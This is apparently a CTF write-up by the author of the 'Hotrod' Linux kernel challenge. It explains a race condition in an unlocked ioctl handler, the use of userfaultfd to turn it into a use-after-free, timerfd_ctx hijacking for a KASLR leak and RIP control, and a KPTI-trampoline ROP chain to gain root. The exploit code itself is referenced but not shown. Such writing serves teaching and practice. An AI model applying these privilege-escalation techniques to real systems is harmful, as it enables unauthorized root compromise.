Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020; Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.
Before I start, I would like to acknowledge and give appropriate credit to all the links (posted throughout this article) I studied off of to make both this challenge and my exploit possible.
If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.
Opening this challenge up, it looks like a standard kernel pwn setup. A file system, bzImage, and a qemu launch script is given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:
The qemu launch script is the following:
This tells us that SMEP, KPTI, and KASLR is enabled, but there is no SMAP (which simplifies this a lot).
We can also use vmlinux-extract to help extract the kernel from its compressed file. The driver itself is hotrod.ko based on the startup script (and the name of the challenge). Now, let's do a quick analysis of the driver.
Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device also has a file_operations struct where only the unlocked_ioctl field is populated. Looking through hotrod_ioctl, one can also infer that there is a global struct storing both the size as an unsigned long and a pointer to an allocated chunk located at 0x7e0 relative to module base. This function also has an add, show, delete, and edit function, all of which can only be used once (and you only get one hotrod total). Alloc occurs when the ioctl argument is 0xBAADC0DE.
It checks if you have already attempted an allocation and if the hotrod has already been populated. If not, it will allocate a chunk for the hotrod and sets its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl argument is 0xC001C0DE.
Again, proper checks are ensured, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.
Again, it seems quite safe. We can use this for a leak after we allocate and free certain kernel structures though since kmalloc() doesn't zero out memory. Lastly, edit occurs with argument 0xDEADC0DE.
Again, it seems pretty safe. Like the viewing function, the argument is interpreted as like a hotrod struct as well. The sizes for editing (as well for viewing earlier on) are both checked (so no going out of bounds or overflows). In edit's case, if the size check is satisfactory, it will proceed to copy the user's data to the kernel hotrod's car.
Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutexes were never used, opening this up to race conditions.
Due to the checks on sizes and restriction to only use each feature once, a good race strategy would be to launch edit in one thread, and in another thread, quickly free the chunk and allocate another kernel structure in a way where the second copy_from_user() happens such that the chunk is already freed but the pointer to the chunk is also already passed to the function. A great way to reliably race is with the userfaultfd syscall. With userfaultfd, we can set up a page fault handler over a certain page we mmap in userspace; even when a pagefault occurs for the kernel accessing it, our handler will run, from which we can hang the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is actually an extremely common technique to reliably race in the kernel, with several articles and CTF challenges including this concept (such as the famous Balsn CTF KrazyNote challenge):
There does seem to a recent hardening against this method of attack as mentioned here, but is not set by default for compatibility reasons.
From our exploit's perspective, we can have one thread call edit and have it copy over a user hotrod struct where the data, or "car," pointer points to a page where we setup a userfaultfd handler for. Then during edit's second copy_from_user(), it will pagefault when it attempts to copy based on our pointer, and our handler will take over from there, from which we can free and allocate other kernel structures over the same region. Then, you can unblock the thread by copying over the data we want placed there. Personally, I kept all the original data with the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I change to a stack pivot. Now, after the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.
Due to our structure size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct; we can allocate it with a timerfd_create() with the CLOCK_REALTIME option (other options will also work) and a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the location that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a certain time period which you can control in the itimerspec struct. This structure has been documented before in both ptr-yudai's article about useful kernel structures, this paper about exploitable structures, and GNote from TokyoWesterns 2019. Note that for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread to wait for the function pointer to trigger with a getchar().
To grab a leak, I had to spray these structs in the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate data there for us to grab the leak reliably. With the KASLR leak, we can rebase the entire kernel relative to startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot it to a userspace stack as there is no SMAP. Note that you need to specify a valid range for ropper/ROPGadget to search for gadgets; otherwise, it'll find gadgets that aren't in executable sections in the kernel. Take a look at the example below:
Since there is KPTI and SMEP, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by managing the two sets via the 12th bit of the CR3 register (the userspace portion of kernel page tables is set to NX, and the only additional information given to userspace page tables is the information necessary to enter and exit the kernel). Instead, it is better to rely on a kpti trampoline and have it fix the CR3 for us so we can go back (swapgs_restore_regs_and_return_to_usermode); these functionalities exist in the kernel because it needs to handle this for routines like syscalls. I usually add +0x16 to where this is located, just so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline combined with a commit_creds(init_cred) to change my uid to 0 beforehand, I can then choose whichever function to return to in my userspace code with root privileges. Of course, I needed to specify the cs, ss, r_flags, and stack (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS) for the trampoline to return to as well; I just used the values I saved beforehand in the userspace process.
In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing open read write in my function. I also had to just halt the OS; otherwise, the kernel panics on the return, hangs, and then somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.
Below is my exploit with comments and linked resources:
To transfer the exploit to the remote instance, I just compiled it statically with gcc, gzip'd it, and then transfered with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one really was working under time constraints, compiling with a more minimalistic library like musl or uclibc could help. Here's the final result: